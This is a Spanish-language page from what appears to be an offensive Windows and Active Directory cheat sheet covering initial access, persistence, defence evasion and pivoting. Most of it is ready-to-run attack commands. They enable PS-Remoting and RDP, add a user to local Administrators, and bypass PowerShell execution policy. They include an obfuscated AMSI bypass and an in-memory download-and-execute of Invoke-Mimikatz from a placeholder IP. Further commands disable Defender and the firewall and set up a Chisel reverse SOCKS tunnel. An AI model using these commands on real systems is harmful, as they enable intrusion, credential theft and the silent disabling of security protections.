2. Vector de entrada

2.1. Habilitar PS-Remoting

Powershell -ep bypass Enable-PSRemoting -force

Habilitar RDP

reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

2.2. Persistencia

Añadir usuario al grupo de local Administrators

net localgroup Administrators <Domain\\USER> /add

2.3. Evasión de la seguridad

Powershell

#Current Language Mode 
$ExecutionContext.SessionState.LanguageMode

#Execution Policy Bypass
powershell –ExecutionPolicy bypass
powershell –c <cmd>
powershell –encodedcommand $env:PSExecutionPolicyPreference="bypass"

AMSI

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

2.4. Importar módulos

Importar ficheros locales

Import-Module .\\PowerView.ps1
. .\\PowerUp.ps1

Importar en memoria

powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('<http://IP/Invoke-Mimikatz.ps1>')"

2.5. Parar medidas de seguridad

Defender

Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
Set-MpPreference -DisableIOAVProtection $true

#Disable AMSI
Set-MpPreference -DisableScriptScanning 1

Firewall

netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off

2.6. Pivoting

Chisel

En tu kali

./chisel server -p 80 --reverse

En la máquina de pivote

.\\Chisel.exe client <Your_IP>:80 R:1080:socks

Previous1. Enumeración Next3. Obtención de credenciales

Last updated 8 months ago

Was this helpful?